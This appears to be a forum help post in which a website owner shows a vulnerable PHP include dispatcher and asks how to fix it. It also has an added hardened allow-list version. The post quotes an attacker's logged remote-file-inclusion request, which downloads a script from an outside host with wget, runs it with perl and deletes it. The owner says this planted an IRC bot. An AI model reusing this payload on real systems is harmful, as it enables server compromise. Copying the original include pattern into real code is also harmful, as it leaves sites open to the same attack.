OK, I need to make this script more secure ASAP!
<?php
if ($body == "news.php" ) {
include $body;
} else {
include "403.php";
}
?>
I have listed out in the first part all my pages.
My URL is index.php?body=news.php, and so on for the other approved pages,
but somehow someone was able to do this:
index.php?body=(site address).com/thefive/tool.gif?&cmd=cd%20/tmp/;wget%20(site address)/gif.txt;perl%20gif.txt;rm%20-rf%20gif* HTTP/1.0" 200 13533 www.pappyspage.com "-" "Mozilla/5.0" "-"
It shouldn't have gone through, but it did, and the script created an IRC bot on my webserver. Luckily, the port they used was blocked via the firewall,
but I need to fix this ASAP.
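
One way to harden the dispatch asked about above, as an added example that is not part of the original post: the request value is used only as a lookup key into a fixed allow-list and is never handed to include. The `contact.php` entry and the `resolve_page` function name are assumptions for illustration; `news.php` and `403.php` come from the post.

```php
<?php
// Added example: allow-list dispatch for index.php?body=...
// Only news.php and 403.php are taken from the post; other names are assumed.

// Approved request values mapped to fixed local files. The request value is
// only ever a lookup key; the path given to include comes from this constant.
const APPROVED_PAGES = [
    'news.php'    => 'news.php',
    'contact.php' => 'contact.php', // hypothetical second approved page
];

function resolve_page($requested): string
{
    // Reject arrays (index.php?body[]=x) and any other non-string input.
    if (!is_string($requested)) {
        return '403.php';
    }
    // Exact key match: remote URLs, "../" sequences and extra query text
    // such as "?&cmd=..." can never equal an approved key.
    if (!array_key_exists($requested, APPROVED_PAGES)) {
        return '403.php';
    }
    return APPROVED_PAGES[$requested];
}

// Read the parameter explicitly from the query string rather than relying
// on a global $body being filled in from the request (register_globals).
$page = resolve_page($_GET['body'] ?? null);

if ($page === '403.php') {
    http_response_code(403);
}

// __DIR__ anchors the include to this script's own directory, so the
// argument is always a local filesystem path built from constants.
include __DIR__ . '/' . $page;
```

Setting `allow_url_include = Off` in php.ini additionally stops include from fetching remote URLs, which limits the damage if a check like this is ever bypassed.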